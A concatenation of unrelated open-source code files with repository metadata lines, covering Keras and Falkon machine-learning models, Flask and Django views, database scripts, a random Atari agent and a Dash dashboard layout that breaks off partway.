grupos_listado_id.append(grupo_id)
index_grupo = self.get_search(grupos_listado, row['grupo'])
if index_grupo != -1:
grupo_id = grupos_listado_id[index_grupo]
persona_new = {
"nombre": row["nombre"],
"segundo_nombre": row["segundo_nombre"],
"apellido": row["apellido"],
"segundo_apellido": row["segundo_apellido"],
"celular_whatsapp": row["whatsapp_prefijo"],
"celular_llamada": row["celular_whatsapp"],
"documento": row["documento"],
"fechanacimiento": row["fechanacimiento"],
"pais_id": row["pais"],
"grupo_id": grupo_id,
"seccion": row["seccion"],
"grupo": row["grupo"]
}
try:
self.post_add_person(persona_new, user)
validos.append(persona_new)
num_validos = num_validos + 1
except Exception as e:
invalidos.append(persona_new)
num_invalidos = num_invalidos + 1
data = {
"validos": {"count": num_validos, "data": validos},
"invalidos": {"count": num_invalidos, "data": invalidos},
"error": num_invalidos,
}
self.data = data
return Response(self.response_obj)
except Exception as e:
self.error = str(e)
self.status = status.HTTP_400_BAD_REQUEST
return Response(self.response_obj) | YilberthAndres/masivo | mensajeria/views/carga/carga_distribucion.py | carga_distribucion.py | py | 16,140 | python | es | code | 0 | github-code | 36 |
73421284263 |
import tensorflow as tf
import keras as K
from keras import callbacks, optimizers
from keras import backend as KB
from keras.engine import Layer
from keras.layers import Activation
from keras.layers import LeakyReLU, Dense, Input, Embedding, Dropout, Reshape, Concatenate, MaxPooling1D, Flatten
from keras.layers import Flatten, SpatialDropout1D, Conv1D
from keras.models import Model
from keras.utils import plot_model
from keras.models import Sequential
from keras.preprocessing import sequence
from keras.layers import Add
# capsule layers from Xifeng Guo
# https://github.com/XifengGuo/CapsNet-Keras
from capsulelayers import CapsuleLayer, PrimaryCap, PrimaryCap1D, Length, Mask
# Build the CapsNet model
def draw_capsnet_model(hyper_param, embedding_matrix=None, verbose=True):
"""
Input: hyper parameters dictionary
Construct:
input layers : x , x_pos(o), x_captialization(o)
embedding matrix : use_glove or randomly initialize
conv1 : first convolution layer
primarycaps : conv2 and squash function applied
ner_caps : make 8 ner capsules of specified dim
out_pred : calc length of 8 ner capsules as 8 prob. predictions over 8 ner classes
Returns:
if decoding/reconstruction disabled --> a single keras.models.Model object
if decoding/reconstruction enabled --> three keras.models.Model objects
"""
# input layer(s)
x = Input(shape=(hyper_param['maxlen'],), name='x')
if hyper_param['use_pos_tags'] :
x_pos = Input(shape=(hyper_param['maxlen'],hyper_param['poslen']), name='x_pos')
if hyper_param['use_capitalization_info'] :
x_capital = Input(shape=(hyper_param['maxlen'], hyper_param['capitallen']), name='x_capital')
# embedding matrix
if hyper_param['use_glove']:
embed = Embedding(hyper_param['max_features'], hyper_param['embed_dim'], weights=[embedding_matrix],\
input_length=hyper_param['maxlen'], trainable=hyper_param['allow_glove_retrain'])(x)
else:
embed = Embedding(hyper_param['max_features'], hyper_param['embed_dim'], input_length=hyper_param['maxlen'],\
embeddings_initializer="random_uniform" )(x)
# concat embeddings with additional features
if hyper_param['use_pos_tags'] and hyper_param['use_capitalization_info'] :
embed = Concatenate(axis=-1)([embed, x_pos, x_capital])
elif hyper_param['use_pos_tags'] and (not hyper_param['use_capitalization_info']) :
embed = Concatenate(axis=-1)([embed, x_pos])
elif (not hyper_param['use_pos_tags']) and hyper_param['use_capitalization_info'] :
embed = Concatenate(axis=-1)([embed, x_capital])
else :
embed = embed
# add dropout here
if hyper_param['embed_dropout'] > 0.0:
embed = SpatialDropout1D( hyper_param['embed_dropout'])(embed)
# feed embeddings into conv1
conv1 = Conv1D( filters=hyper_param['conv1_filters'], \
kernel_size=hyper_param['conv1_kernel_size'],\
strides=hyper_param['conv1_strides'], \
padding=hyper_param['conv1_padding'],\
activation='relu', name='conv1')(embed)
# make primary capsules
if hyper_param['use_2D_primarycaps']:
convShape = conv1.get_shape().as_list()
conv1 = Reshape(( convShape[1], convShape[2], 1))(conv1)
primaryCapLayer = PrimaryCap
else:
primaryCapLayer = PrimaryCap1D
# make primary capsules
primarycaps = primaryCapLayer(conv1, \
dim_capsule=hyper_param['primarycaps_dim_capsule'],\
n_channels=hyper_param['primarycaps_n_channels'],\
kernel_size=hyper_param['primarycaps_kernel_size'], \
strides=hyper_param['primarycaps_strides'], \
padding=hyper_param['primarycaps_padding'])
# make ner capsules
ner_caps = CapsuleLayer(num_capsule=hyper_param['ner_classes'], \
dim_capsule=hyper_param['ner_capsule_dim'], \
routings=hyper_param['num_dynamic_routing_passes'], \
name='nercaps')(primarycaps)
# replace each ner capsuel with its length
out_pred = Length(name='out_pred')(ner_caps)
if verbose:
print ("x", x.get_shape())
if hyper_param['use_pos_tags'] : print ("x_pos", x_pos.get_shape())
if hyper_param['use_capitalization_info'] : print ("x_capital", x_capital.get_shape())
print ("embed", embed.get_shape())
print ("conv1", conv1.get_shape())
print ("primarycaps", primarycaps.get_shape())
print ("ner_caps", ner_caps.get_shape())
print ("out_pred", out_pred.get_shape())
if hyper_param['use_decoder']:
decoder_y_cat = Input(shape=(hyper_param['ner_classes'],), name='decoder_y_cat')
masked_by_y = Mask(name='masked_by_y')([ner_caps, decoder_y_cat]) # true label is used to mask during training
masked = Mask()(ner_caps) # mask using capsule with maximal length for predicion
# decoder for training
train_decoder_dense1 = Dense(hyper_param['decoder_feed_forward_1'], activation='relu',\
input_dim=hyper_param['ner_capsule_dim']*hyper_param['ner_classes'],\
name='train_decoder_dense1')(masked_by_y)
train_decoder_dense1_dropout = Dropout(hyper_param['decoder_dropout'])(train_decoder_dense1)
train_decoder_dense2 = Dense(hyper_param['decoder_feed_forward_2'], activation='relu',\
name='train_decoder_dense2')(train_decoder_dense1_dropout)
train_decoder_dense2_dropout = Dropout(hyper_param['decoder_dropout'])(train_decoder_dense2)
train_decoder_output = Dense(hyper_param['embed_dim'], activation=None,\
name='train_decoder_output')(train_decoder_dense2_dropout)
# decoder for evaluation (prediction)
eval_decoder_dense1 = Dense(hyper_param['decoder_feed_forward_1'], activation='relu',\
input_dim=hyper_param['ner_capsule_dim']*hyper_param['ner_classes'],\
name='eval_decoder_dense1')(masked)
eval_decoder_dense2 = Dense(hyper_param['decoder_feed_forward_2'], activation='relu',\
name='eval_decoder_dense2')(eval_decoder_dense1)
eval_decoder_output = Dense(hyper_param['embed_dim'], activation=None,\
name='eval_decoder_output')(eval_decoder_dense2)
if verbose:
print ("Decoder model enabled for GloVe vector deconstruction...")
print ("decoder_y_cat", decoder_y_cat.get_shape())
print ("masked_by_y", masked_by_y.get_shape())
print ("train_decoder_dense1", train_decoder_dense1.get_shape())
print ("train_decoder_dense1_dropout", train_decoder_dense1_dropout.get_shape())
print ("train_decoder_dense2", train_decoder_dense2.get_shape())
print ("train_decoder_dense2_dropout", train_decoder_dense2_dropout.get_shape())
print ("train_decoder_output", train_decoder_output.get_shape())
print ("masked", masked.get_shape())
print ("eval_decoder_dense1", eval_decoder_dense1.get_shape())
print ("eval_decoder_dense2", eval_decoder_dense2.get_shape())
print ("eval_decoder_output", eval_decoder_output.get_shape())
# construct input list
if hyper_param['use_pos_tags'] and hyper_param['use_capitalization_info'] :
input_list = [x, x_pos, x_capital]
elif hyper_param['use_pos_tags'] and (not hyper_param['use_capitalization_info']) :
input_list = [x, x_pos]
elif (not hyper_param['use_pos_tags']) and hyper_param['use_capitalization_info'] :
input_list = [x, x_capital]
else:
input_list = [x]
if hyper_param['use_decoder']==False:
print ("decoder/reconstruction DISabled")
print ("returning 1 model")
return Model(inputs=input_list, outputs=[out_pred])
else :
train_model = Model(inputs=input_list+[decoder_y_cat], outputs=[out_pred, train_decoder_output])
eval_model = Model(inputs=input_list, outputs=[out_pred, eval_decoder_output])
print ("decoder/reconstruction enabled")
print ("returning a list of 2 models: train_model, eval_model")
return train_model, eval_model
# marginal loss
def margin_loss(y_true, y_pred):
L = y_true * KB.square(KB.maximum(0., 0.9 - y_pred)) + 0.5 * (1 - y_true) * KB.square(KB.maximum(0., y_pred - 0.1))
return KB.mean(KB.sum(L, 1))
# decoder loss
def custom_cosine_proximity(y_true, y_pred):
y_true = tf.nn.l2_normalize(y_true, dim=-1)
y_pred = tf.nn.l2_normalize(y_pred, dim=-1)
return -KB.sum(y_true * y_pred)
# compile the model
def compile_caps_model(hyper_param, model):
"""
Input: keras.models.Model object, see draw_capsnet_model() output. This is a graph with all layers drawn and connected
do:
compile with loss function and optimizer
Returns: compiled model
"""
if hyper_param['optimizer'] == "Adam":
opt = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
elif hyper_param['optimizer'] == "SGD":
opt = optimizers.SGD(lr=0.001, decay=1e-6, momentum=0.5, nesterov=True)
elif hyper_param['optimizer'] == None:
raise Exception("No optimizer specified")
if hyper_param.get('use_decoder') == True:
if hyper_param['loss_function'] == 'custom_cosine':
decodeLoss = custom_cosine_proximity
else:
decodeLoss = hyper_param['loss_function']
model_loss = [margin_loss, decodeLoss] # work in progress
loss_wts = [1, hyper_param['lam_recon']]
else:
model_loss = margin_loss
loss_wts = None
model.compile(optimizer=opt, #'adam',
loss=model_loss,
loss_weights=loss_wts,
metrics={'out_pred':'accuracy'})
return model
def fit_model( hyper_param, model, modelName, trainX_dict, devX_list_arrayS, trainY_dict, devY_list_arrayS):
#Saving weights and logging
log = callbacks.CSVLogger(hyper_param['save_dir'] + '/{0}_historylog.csv'.format(modelName))
tb = callbacks.TensorBoard(log_dir=hyper_param['save_dir'] + '/tensorboard-logs', \
batch_size=hyper_param['batch_size'], histogram_freq=hyper_param['debug'])
checkpoint = callbacks.ModelCheckpoint(hyper_param['save_dir'] + '/weights-{epoch:02d}.h5', \
save_best_only=True, save_weights_only=True, verbose=1)
es = callbacks.EarlyStopping(patience=hyper_param['stopping_patience'], verbose=2)
#lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: 0.001 * np.exp(-epoch / 10.))
model.summary()
# Save a png of the model shapes and flow
# must have installed pydot and graphviz...
# conda install pydot
# conda install -c anaconda graphviz
# sometimes graphviz is a little squirrely, if so, use: pip install graphviz
# plot_model( model, to_file=hyper_param['save_dir'] + '/{0}.png'.format(modelName), show_shapes=True)
#loss = margin_loss
data = model.fit( x=trainX_dict, # {'x':trainX, 'x_pos':trainX_pos_cat, 'x_capital':trainX_capitals_cat, (o)'decoder_y_cat':trainY_cat}
y=trainY_dict, #!{'out_pred':trainY_cat, (o)'decoder_output':train_decoderY}
batch_size=hyper_param['batch_size'],
epochs=hyper_param['epochs'],
validation_data=[devX_list_arrayS, devY_list_arrayS], #! [devX, devX_pos_cat, devX_capitals_cat, (o)devY_cat], [devY_cat, (o)dev_decoderY]
callbacks=[log, tb, checkpoint, es],
verbose=1)
| Chucooleg/CapsNet_for_NER | code/buildCapsModel.py | buildCapsModel.py | py | 12,144 | python | en | code | 10 | github-code | 36 |
10500012306 |
thunderstorm = '\U0001F4A8' # Code: 200's, 900, 901, 902, 905
drizzle = '\U0001F4A7' # Code: 300's
rain = '\U0001F327' # Code: 500's
snowflake = '\U00002744' # Code: 600's snowflake
snowman = '\U000026C4' # Code: 600's snowman, 903, 906
atmosphere = '\U0001F301' # Code: 700's foogy
clearSky = '\U00002600' # Code: 800 clear sky
fewClouds = '\U000026C5' # Code: 801 sun behind clouds
clouds = '\U00002601' # Code: 802-803-804 clouds general
hot = '\U0001F525' # Code: 904
defaultEmoji = '\U0001F300' # default emojis
def getemoji(weatherid):
if weatherid:
if str(weatherid)[0] == '2' or weatherid == 900 or weatherid == 901 or weatherid == 902 or weatherid == 905:
return thunderstorm
elif str(weatherid)[0] == '3':
return drizzle
elif str(weatherid)[0] == '5':
return rain
elif str(weatherid)[0] == '6' or weatherid == 903 or weatherid == 906:
return snowflake + ' ' + snowman
elif str(weatherid)[0] == '7':
return atmosphere
elif weatherid == 800:
return clearSky
elif weatherid == 801:
return fewClouds
elif weatherid == 802 or weatherid == 803 or weatherid == 804:
return clouds
elif weatherid == 904:
return hot
else:
return defaultEmoji
else:
return defaultEmoji
| lotrik84/get_the_weather_bot | emoji.py | emoji.py | py | 1,400 | python | en | code | 0 | github-code | 36 |
14438218202 | import psycopg2
update_sql = "UPDATE test SET data = %s WHERE num = %s"
conn = None
try:
# connect to the PostgreSQL database
conn = psycopg2.connect(
dbname='spacedys',
host='localhost',
user='spacedys',
password='password')
# create a new cursor
cur = conn.cursor()
# execute the UPDTE statement
cur.execute(update_sql, ("ghjklm", 100))
print("Rows modified:")
print(cur.rowcount)
# commit the changes to the database
conn.commit()
# close communication with the database
cur.close()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if conn is not None:
conn.close()
| nicolacammillini/spacedys | docs/demos/db/update-pg.py | update-pg.py | py | 694 | python | en | code | 0 | github-code | 36 |
23216322875 | """Add season_bet table
Revision ID: 8076a0692fc3
Revises:
Create Date: 2023-03-12 10:53:35.538988
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8076a0692fc3'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('season_bet',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('value', sa.String(length=50), nullable=True),
sa.Column('rank', sa.Integer(), nullable=True),
sa.Column('type', sa.String(length=50), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('season_bet')
# ### end Alembic commands ###
| rbikar/f1-guessing-game-app | migrations/versions/8076a0692fc3_add_season_bet_table.py | 8076a0692fc3_add_season_bet_table.py | py | 962 | python | en | code | 0 | github-code | 36 |
20798421821 |
# coding: utf-8
# In[1]:
import os
import re
# In[2]:
# reads lines from a text file given by filename
def readlines(filename):
file = open(filename, "r")
return file.readlines()
# In[3]:
def parse_generation_line(line):
regex = r"(\d+) generations"
match = re.search(regex, line)
return match.group(1)
# In[4]:
def parse_duration_line(line):
regex = r"(\d+\.\d+) seconds"
match = re.search(regex, line)
return match.group(1)
# In[5]:
# log files have 2 intro lines, followed by
# a generation count, and duration line
lines_per_test = 30 * 2
def process_test_log(lines, csv_file):
# Retain runs details
csv_file.write(lines[0])
csv_file.write(lines[1])
lines = lines[2:]
# write CSV headings
csv_file.write("generation,duration\n")
for i in range(0, lines_per_test, 2):
# generation = parse_generation_line(lines[i])
duration = parse_duration_line(lines[i+1])
# print('{}, {}'.format(generation, duration))
# csv_file.write('{}, {}\n'.format(generation, duration))
csv_file.write('{}\n'.format(duration))
# return unprocessed lines
return lines[lines_per_test:]
# In[6]:
def create_csv_file(logfile):
prefix, suffix = logfile.split(".")
# print('prefix: {}\nsuffix: {}'.format(prefix, suffix))
csv_filename = prefix + ".csv"
csvfile = open(csv_filename, "w")
lines = readlines(logfile)
while (len(lines) > 0):
lines = process_test_log(lines, csvfile)
csvfile.close()
# In[7]:
for file in os.listdir("./"):
if file.endswith(".log"):
create_csv_file(file)
| blogscot/travelling-salesman | tools/munge.py | munge.py | py | 1,649 | python | en | code | 3 | github-code | 36 |
15872415911 | import torch
import numpy as np
from falkon import Falkon
from falkon.kernels import GaussianKernel
from falkon.options import FalkonOptions
from falkonhep.models import HEPModel
class FalkonHEPModel(HEPModel):
def create_labels(self, ref_size, data_size):
ref_labels = np.zeros(ref_size, dtype=np.float64) - 1
data_labels = np.ones(data_size, dtype=np.float64)
return np.hstack((ref_labels, data_labels))
def __loglikelihood(self, f):
c = 1e-5
p = (f + 1)/2
n = (1 - f)/2
return torch.log(p / n)
def predict(self, data):
preds = self.model.predict(torch.from_numpy(data).contiguous())
return self.__loglikelihood(preds)
def build_model(self, model_parameters, weight):
def weight_fun(Y, X, idx):
wvec = torch.ones(Y.shape,dtype=Y.dtype)
wvec[Y==-1] = weight
return wvec
cg_tol = model_parameters['cg_tol'] if 'cg_tol' in model_parameters else 1e-7
keops_active = model_parameters['keops_active'] if 'keops_active' in model_parameters else "no"
maxiter = model_parameters['maxiter'] if 'maxiter' in model_parameters else 10000000
use_cpu = model_parameters['use_cpu'] if 'use_cpu' in model_parameters else False
seed = model_parameters['seed'] if 'seed' in model_parameters else None
kernel = GaussianKernel(torch.Tensor([model_parameters['sigma']]))
configuration = {
'kernel' : kernel,
'penalty' : model_parameters['penalty'],
'maxiter' : maxiter,
'M' : model_parameters['M'],
'options' : FalkonOptions(cg_tolerance=cg_tol, keops_active=keops_active, use_cpu=use_cpu),
'weight_fn' : weight_fun,
'seed' : seed
}
self.model= Falkon(**configuration) | FalkonHEP/falkonhep | falkonhep/models/flkhep_model.py | flkhep_model.py | py | 1,858 | python | en | code | 1 | github-code | 36 |
28068819422 | # 숫자 문자열과 영단어
# https://programmers.co.kr/learn/courses/30/lessons/81301
def solution(s):
answer = ''
_dict = {'zero': 0, 'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5, 'six': 6, 'seven': 7, 'eight': 8, 'nine': 9}
alpha = ''
for i in s:
if i.isalpha():
alpha += i
if alpha in _dict.keys():
answer += str(_dict[alpha])
alpha = ''
else:
answer += i
return int(answer)
s = 'one4seveneight'
print(solution(s))
| hwanginbeom/algorithm_study | 2.algorithm_test/21.07.11/21.07.11_wooseok.py | 21.07.11_wooseok.py | py | 544 | python | en | code | 3 | github-code | 36 |
34212066405 | # https://www.acmicpc.net/problem/14502
# solution
# 1) 임의로 3개의 벽을 세운다(dfs)
# 2) 바이러스를 퍼뜨린다(bfs)
# 3) 안전구역의 크기를 구해서 최대값을 갱신한다
# 4) 1)로 돌아가 모든 경우에 대해 반복한다
# 5) 안전구역 크기의 최대값을 출력한다
# TIL
# 2차원 배열에서 가능한 모든 조합을 재귀적으로 탐색하는 코드( line:60~66 )
## -> 몫(i//m)과 나머지(i%m)를 이용한 탐색과 재귀함수 내에 반복문 있는 형태
import copy
from collections import deque
def calc_safe_area():
global walled_map
area = 0
for i in range(N):
for j in range(M):
if walled_map[i][j] == 0:
area += 1
return area
def virus_spread(virus_lst_copy): # 초기의 virus_lst를 받아서 bfs로 virus 퍼뜨림
global walled_map
dx = [1,0,-1,0]
dy = [0,1,0,-1]
q = deque(virus_lst_copy)
while len(q) > 0:
x, y = q.popleft()
for d_idx in range(4):
next_x = x + dx[d_idx]
next_y = y + dy[d_idx]
if ( (next_x >=0) and (next_x <N) and (next_y >=0) and (next_y <M) and (walled_map[next_x][next_y]==0) ):
walled_map[next_x][next_y] = 2
q.append((next_x,next_y))
def calculate(start, wall_cnt): # 벽을 세운 뒤 바이러스 퍼뜨리고 안전구역 넓이 계산해 최대값일 경우 갱신
global lab_map, max_area, N, M
if wall_cnt == 3: # 3개의 벽 모두 세워짐
global walled_map
walled_map = copy.deepcopy(lab_map)
virus_lst_copy = copy.deepcopy(virus_lst)
virus_spread(virus_lst_copy)
max_area = max(max_area, calc_safe_area())
return
for i in range(start, N*M):
x = i//M
y = i%M
if lab_map[x][y] == 0:
lab_map[x][y] = 1
calculate(i+1,wall_cnt+1)
lab_map[x][y] = 0
if __name__ == "__main__":
N, M = tuple(map(int, input().split()))
lab_map = []
for _ in range(N):
lab_map.append(list(map(int, input().split())))
virus_lst = []
for i in range(N):
for j in range(M):
if lab_map[i][j] == 2:
virus_lst.append((i,j))
max_area = 0 # 안전구역의 최대크기
calculate(0,0)
print(max_area)
| chankoo/problem-solving | graph/14502-연구소.py | 14502-연구소.py | py | 2,358 | python | ko | code | 1 | github-code | 36 |
22377349542 | import pandas as pd
import matplotlib.pyplot as plt
import os # file muveletek
import datetime
from datetime import date
import time
import copy
import numpy as np
class nHop:
time_stamp = ''
next_hop = ''
count = 0
per8 = 0
adv_range = 0
def __init__(self):
self.time_stamp = ''
self.next_hop = ''
self.count = 0
self.per8 = 0
self.adv_range = 0
def blank_sheet(self):
self.time_stamp = ''
self.next_hop = ''
self.count = 0
self.per8 = 0
def tostring(self):
return str(self.time_stamp) + "," + str(self.next_hop) + "," + str(self.count) + "," + str(self.per8) + "," + str(self.adv_range)
class Ip:
time_stamp = ''
address = 0
prefix = 0
nh = 0
msp = 0
bin = ''
def __init__(self, address, prefix, nh):
self.address = address
self.prefix = prefix
self.nh = nh
def tostring(self):
return str(self.bin) + '\t' + str(self.address) + '\t' + str(self.nh) + '\t' + str(self.prefix) + '\t' + str(
self.msp)
def write_pre_bin(self):
return str(self.bin[0:int(self.prefix)])
def store_to_list(filepath): # első prefix tárolása
lst = []
with open(filepath) as fp:
line = fp.readline()
# default gateway kihagyása
if line[8] == '0':
line = fp.readline()
cnt = 1
while line:
# print("Line {}: {}".format(cnt, line.strip()))
tmp = line.split("\t")
tmp2 = tmp[0].split("/")
p = Ip(tmp2[0], tmp2[1], tmp[1].strip())
mydate= filepath.split("_")[-1].split('.')[0]
p.time_stamp = mydate[0]+mydate[1]+mydate[2]+mydate[3]+'-'+mydate[4]+mydate[5]+'-'+mydate[6]+mydate[7]
lst.append(p)
cnt += 1
line = fp.readline()
fp.close()
return lst
def calc_per8(per8):
return (2 ** (32 - int(per8))) / (2 ** 24)
location = "C:/o"
workFiles = []
workList = []
hops = {}
if __name__ == "__main__":
start = datetime.datetime.now()
print('start ' + str(start))
for root, dirs, files in os.walk(location):
for file in files:
if file.split('.')[-1] == 'txt':
workFiles.append(root + '/' + file)
print(root + '/' + file)
# for filepath in workFiles:
# store_to_list(filepath, workList)
workList = store_to_list("F:/cha6/in/bme_fib_20191101.txt")
for item in workList:
if item.nh not in hops:
hop = nHop()
hop.time_stamp = item.time_stamp
hop.next_hop = item.nh
hop.count = 1
hop.per8 = calc_per8(item.prefix)
hop.adv_range = 2 ** (32 - int(item.prefix))
hops[item.nh] = hop
else:
hop = nHop()
hop.time_stamp = item.time_stamp
hop.next_hop = item.nh
hop.count = hops[item.nh].count + 1
hop.per8 = hops[item.nh].per8 + calc_per8(item.prefix)
hop.adv_range = hops[item.nh].adv_range + 2 ** (32 - int(item.prefix))
hops[item.nh] = hop
for hop in hops.values():
print(hop.tostring())
print('finished ' + str(datetime.datetime.now() - start))
| Tomikaze/IP-stats-trends | venv/nexthop.py | nexthop.py | py | 2,796 | python | en | code | 0 | github-code | 36 |
13483905571 | import numpy as np
from numpy import random
BIT_WIDTH = 20
NUM_CLASS = 4
class FizzBuzzDataSet(object):
TOTAL_DATA = 0
CURRENT_I = 0
def __init__(self, size):
if size < 0:
size = 0
self.TOTAL_DATA = size
self.CURRENT_I = 0
@staticmethod
def _encode(num):
return [num >> d & 1 for d in range(BIT_WIDTH)]
@staticmethod
def _encode_label(num):
if num % 15 == 0:
return 0
elif num % 5 == 0:
return 1
elif num % 3 == 0:
return 2
else:
return 3
def _labels(self, nums):
result_label = []
for i in range(len(nums)):
label_y = self._encode_label(nums[i])
result_label.append(label_y)
return np.array(result_label)
def _numbers(self, size):
"""
Assume the numbers for fizzbuzz won't be needing more than 10 bits < 1024
"""
result_data = []
result_num = []
for i in range(size):
num = random.randint(0, (1<<BIT_WIDTH)-1)
result_num.append(num)
encoded = self._encode(num)
result_data.append(encoded)
return np.array(result_data), result_num
def next_batch(self, batch_size):
"""
Returns:
data
label
"""
size = batch_size
input_x, real_nums = self._numbers(size)
label_y = self._labels(real_nums)
return input_x, label_y
@property
def num_examples(self):
return self.TOTAL_DATA
| BrianPin/fbitf | data_set.py | data_set.py | py | 1,588 | python | en | code | 0 | github-code | 36 |
23536887489 | import numpy as np
from collections import deque
import gymnasium as gym
from stable_baselines3.common.atari_wrappers import (
ClipRewardEnv,
EpisodicLifeEnv,
FireResetEnv,
MaxAndSkipEnv,
NoopResetEnv,
)
class Agent:
def __init__(self, eval_env):
self.eval_env = eval_env
def eval(self):
obs, _ = self.eval_env.reset()
while True:
action = np.array([self.eval_env.single_action_space.sample() for _ in range(1)])
obs, _, _, _, infos = self.eval_env.step(action)
if "final_info" in infos:
for info in infos["final_info"]:
# Skip the envs that are not done
if "episode" not in info:
continue
return info['episode']['r'], info['episode']['l']
def run(self):
eval_rewards = deque(maxlen=10)
eval_steps = deque(maxlen=10)
for episode in range(10):
eval_reward, eval_step = self.eval()
eval_rewards.append(eval_reward)
eval_steps.append(eval_step)
return np.mean(eval_rewards), np.mean(eval_steps)
if __name__ == "__main__":
def make_env(env_name, seed, resize=84):
def thunk():
env = gym.make(env_name)
env = gym.wrappers.RecordEpisodeStatistics(env)
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
env = EpisodicLifeEnv(env)
if "FIRE" in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = ClipRewardEnv(env)
if len(env.observation_space.shape): # pixel obs
env = gym.wrappers.ResizeObservation(env, (resize, resize))
env = gym.wrappers.GrayScaleObservation(env)
env = gym.wrappers.FrameStack(env, 4)
env.action_space.seed(seed)
return env
return thunk
env_names = [
"Alien-v5", "Amidar-v5", "Assault-v5", "Asterix-v5", "BankHeist-v5",
"BattleZone-v5", "Boxing-v5", "Breakout-v5", "ChopperCommand-v5", "CrazyClimber-v5",
"DemonAttack-v5", "Freeway-v5", "Frostbite-v5", "Gopher-v5", "Hero-v5",
"IceHockey-v5", "Jamesbond-v5", "Kangaroo-v5", "Krull-v5", "KungFuMaster-v5",
"MsPacman-v5", "Pong-v5", "PrivateEye-v5", "Seaquest-v5", "Skiing-v5",
"Surround-v5", "Tennis-v5", "UpNDown-v5"
]
for env in env_names:
eval_env = gym.vector.SyncVectorEnv([make_env("ALE/" + env, 1)])
random_agent = Agent(eval_env)
rewards = deque(maxlen=10)
steps = deque(maxlen=10)
for i in range(10):
reward, step = random_agent.run()
rewards.append(reward)
steps.append(step)
print(env, "\t", np.mean(rewards), np.std(rewards), "\t", np.mean(rewards), np.std(steps))
| ZangZehua/rlatari | utils/random_atari.py | random_atari.py | py | 2,894 | python | en | code | 2 | github-code | 36 |
20078510579 | from flask import Blueprint, render_template, url_for, request, send_from_directory
from flask_login import login_required, current_user
from werkzeug.utils import redirect
from crm import db
from ..utils.images_handler import save_image_uploads, get_image_list, load_image_uploads, delete_images
from .forms import NewNoteForm, DeleteNoteForm
from .models import Note
bp_note = Blueprint('note', __name__, template_folder='templates')
@bp_note.route('uploads/<filename>')
def uploads(filename):
return load_image_uploads(filename)
@bp_note.route('/', methods=['GET'])
@login_required
def notes():
notes = Note.get_all_with_users()
return render_template('notes.html', notes=notes, title='Notatki')
@bp_note.route('/<idx>', methods=['GET'])
@login_required
def note(idx):
note = Note.get_by_id_with_user(idx)
form = DeleteNoteForm()
image_list = ''
if note.image:
image_list = get_image_list(note)
return render_template('note.html', note=note, form=form, image_list=image_list, title='Szczegóły notatki')
@bp_note.route('/add', methods=['GET', 'POST'])
@login_required
def add():
form = NewNoteForm()
if form.validate_on_submit():
note = Note(title=form.title.data,
description=form.description.data,
user_id=current_user.id,
expire_date=form.expire_date.data,
on_todo_list=form.on_todo_list.data)
if request.args.get('client_id', default=False, type=int):
note.client_id = request.args.get('client_id')
if request.args.get('offer_id', default=False, type=int):
note.offer_id = request.args.get('offer_id')
db.session.add(note)
db.session.flush()
filename = save_image_uploads(form.images, note, current_user.initials)
if filename:
note.image = filename
db.session.commit()
return redirect(url_for('note.notes'))
return render_template('add_note.html', form=form, title='Dodawanie notatki')
@bp_note.route("/delete/<int:idx><delete_img>", methods=['GET'])
@login_required
def delete(idx, delete_img):
note = Note.query.get(idx)
db.session.delete(note)
db.session.commit()
if delete_img == 'True':
delete_images(note)
return redirect(url_for('note.notes'))
| tomasz-rzesikowski/crm | crm/note/views.py | views.py | py | 2,354 | python | en | code | 0 | github-code | 36 |
12575982154 | from distutils.log import INFO
from multiprocessing.sharedctypes import Value
from dash import Dash, html, dcc, Input, Output, State, dash_table
import dash
import dash_bootstrap_components as dbc
import LoraLogger
import pandas as pd
import json
import plotly.io as pio
pio.templates.default = "plotly_dark"
logger = LoraLogger.logger(__name__, INFO)
# app = Dash(__name__, use_pages=True, external_stylesheets=[dbc.themes.VAPOR])
app = Dash(__name__, use_pages=True)
# read data
data_df = pd.read_excel('utils/FAI_results.xlsx')
# Demographic radio button options mappings
with open('utils/demo_mapping.json', 'r') as f:
demo_mapping = json.load(f)
with open('utils/demo_groups.json', 'r') as f:
demo_groups = json.load(f)
with open('utils/fin_mapping.json', 'r') as f:
fin_mapping = json.load(f)
with open('utils/fin_groups.json', 'r') as f:
fin_groups = json.load(f)
l_break = html.P(
id='separate',
children='|',
style={
'display': 'inline',
'margin': '0 5px 0 -5px'
}
)
app.layout = html.Div([
html.H1(
children='PolyU & AskLora FAI Result',
style={
'textAlign': 'center',
'margin-top': '15px'
}
),
html.H5(
children='Grouping Method',
style={
'textAlign': 'center',
'margin-top': '15px'
}
),
dbc.RadioItems(
id='gp_method',
persistence=True,
persistence_type='memory',
options=[
{
"label": "Demographics",
"value": "demo"
},
{
"label": "Fintech Usage",
"value": "fin"
}
],
value="demo",
style={
'textAlign': 'center',
},
labelStyle={
'display': 'block',
},
inline=True
),
html.Div(
id='gp_details',
children=[
html.H5(
id='gp_title_big',
style={
'textAlign': 'center',
'margin-top': '15px'
}
),
dbc.RadioItems(
id='demograph',
persistence=True,
persistence_type='memory',
style={
'textAlign': 'center',
},
labelStyle={
'display': 'block',
},
inline=True,
switch=True
),
html.H5(
id='gp_title',
children=[
'Groups to show'
],
style={
'textAlign': 'center',
'margin-top': '15px'
}
),
html.Div(
children=[
html.Div(
id='group_options_bar',
children=[
html.Div(
id='group_options',
children=[
dbc.Checklist(
id='groups',
),
],
style={
'display': 'inline'
}
),
html.Div(
id='group_options_traces',
children=[
dbc.Checklist(
id='bin_fin',
),
],
style={
'display': 'inline'
}
),
],
style={
'display': 'inline'
}
),
dbc.Checklist(
id='percent',
persistence=True,
persistence_type='memory',
options=[
